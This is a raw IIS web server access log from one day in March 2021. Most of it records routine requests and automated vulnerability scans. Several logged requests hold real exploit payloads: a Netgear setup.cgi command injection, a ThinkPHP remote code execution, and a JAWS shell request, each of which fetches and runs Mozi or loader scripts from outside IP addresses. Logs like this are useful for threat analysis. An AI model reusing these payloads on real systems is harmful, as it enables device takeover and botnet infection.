#Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-10 01:04:49 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-10 01:04:49 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 628 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-10 01:58:23 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-10 01:58:23 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 531 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-10 03:56:45 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-10 03:56:45 192.168.0.14 GET /setup.cgi next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://42.233.103.162:39997/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 80 - 192.168.0.1 - - 404 0 2 531 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-10 04:22:49 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-10 04:22:49 192.168.0.14 GET /login - 80 - 192.168.0.1 - - 404 0 2 390 2021-03-10 04:22:49 192.168.0.14 GET /jenkins/login - 80 - 192.168.0.1 - - 404 0 2 187 2021-03-10 04:22:49 192.168.0.14 GET /manager/html - 80 - 192.168.0.1 Go-http-client/1.1 - 404 0 2 187 2021-03-10 04:22:51 192.168.0.14 GET /wp-login.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 404 0 2 187 2021-03-10 04:22:51 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 200 0 0 203 2021-03-10 04:22:51 192.168.0.14 GET / s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http://194.40.243.98/ldr.sh|sh 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 200 0 0 187 2021-03-10 04:22:52 192.168.0.14 POST /_ignition/execute-solution - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 404 0 2 187 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-10 05:26:49 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-10 05:26:49 192.168.0.14 GET / - 80 - 192.168.0.1 - - 200 0 0 531 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-10 06:22:23 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-10 06:22:23 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 500 2021-03-10 06:31:02 192.168.0.14 GET /login - 80 - 192.168.0.1 - - 404 0 2 93 2021-03-10 06:31:02 192.168.0.14 GET /jenkins/login - 80 - 192.168.0.1 - - 404 0 2 515 2021-03-10 06:31:03 192.168.0.14 GET /manager/html - 80 - 192.168.0.1 Go-http-client/1.1 - 404 0 2 78 2021-03-10 06:31:03 192.168.0.14 GET /wp-login.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 404 0 2 78 2021-03-10 06:31:03 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 200 0 0 93 2021-03-10 06:31:03 192.168.0.14 GET / s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http://194.40.243.98/ldr.sh|sh 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 200 0 0 78 2021-03-10 06:31:03 192.168.0.14 POST /_ignition/execute-solution - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 404 0 2 78 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-10 09:25:10 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-10 09:25:10 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - 200 0 0 562 2021-03-10 09:29:10 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0 - 200 0 0 93 2021-03-10 09:29:10 192.168.0.14 GET /nice+ports,/Trinity.txt.bak - 80 - 192.168.0.1 - - 404 0 2 46 2021-03-10 09:29:10 192.168.0.14 GET / - 80 - 192.168.0.1 - - 200 0 0 62 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-10 10:00:52 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-10 10:00:52 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - 200 0 0 406 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-10 10:25:52 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-10 10:25:52 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - 200 0 0 296 2021-03-10 10:27:46 192.168.0.14 GET / - 80 - 192.168.0.1 python-requests/2.24.0 - 200 0 0 296 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-10 13:18:09 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-10 13:18:09 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 546 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-10 14:02:46 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-10 14:02:46 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - 200 0 0 421 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-10 14:37:13 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-10 14:37:13 192.168.0.14 GET /.env - 80 - 192.168.0.1 Mozilla+5/0 - 404 0 2 375 2021-03-10 14:37:13 192.168.0.14 GET /vendor/phpunit/phpunit/phpunit.xml - 80 - 192.168.0.1 Mozilla+5/0 - 404 0 2 296 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-10 16:51:50 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-10 16:51:50 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 562 2021-03-10 16:57:38 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 296 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-10 17:15:49 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-10 17:15:49 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 281 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-10 18:13:17 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-10 18:13:17 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - 200 0 0 515 2021-03-10 18:19:59 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/60.0.3112.113+Safari/537.36 - 200 0 0 203 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-10 18:41:39 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-10 18:41:39 192.168.0.14 HEAD / - 80 - 192.168.0.1 - - 200 0 0 453 2021-03-10 18:41:44 192.168.0.14 GET /system_api.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/74.0.3729.169+Safari/537.36 - 404 0 2 265 2021-03-10 18:41:47 192.168.0.14 GET /system_api.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/74.0.3729.169+Safari/537.36 - 404 0 2 250 2021-03-10 18:41:49 192.168.0.14 GET /c/version.js - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/74.0.3729.169+Safari/537.36 - 404 0 2 265 2021-03-10 18:41:52 192.168.0.14 GET /streaming/clients_live.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/74.0.3729.169+Safari/537.36 - 404 0 2 250 2021-03-10 18:41:54 192.168.0.14 GET /stalker_portal/c/version.js - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/74.0.3729.169+Safari/537.36 - 404 0 2 250 2021-03-10 18:41:57 192.168.0.14 GET /client_area/ - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/74.0.3729.169+Safari/537.36 - 404 0 2 265 2021-03-10 18:42:00 192.168.0.14 GET /stalker_portal/c/ - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/74.0.3729.169+Safari/537.36 - 404 0 2 265 2021-03-10 18:42:02 192.168.0.14 GET /stream/rtmp.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/74.0.3729.169+Safari/537.36 - 404 0 2 265 2021-03-10 18:51:20 192.168.0.14 GET / - 80 - 192.168.0.1 masscan/1.0+(https://github.com/robertdavidgraham/masscan) - 200 0 1236 13220 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-10 20:52:40 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-10 20:52:40 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - 200 0 0 468 2021-03-10 20:52:40 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - 200 0 0 531 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-10 21:18:07 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-10 21:18:07 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+zgrab/0.x - 200 0 0 406 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-10 22:10:18 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-10 22:10:18 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - 200 0 0 421 2021-03-10 22:11:33 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 359 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-10 22:28:59 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-10 22:28:59 192.168.0.14 GET /shell cd+/tmp;rm+-rf+*;wget+http://182.114.93.251:59988/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws 80 - 192.168.0.1 Hello,+world - 404 0 2 390 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-10 23:37:45 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-10 23:37:45 192.168.0.14 OPTIONS / - 80 - 192.168.0.1 - - 200 0 0 343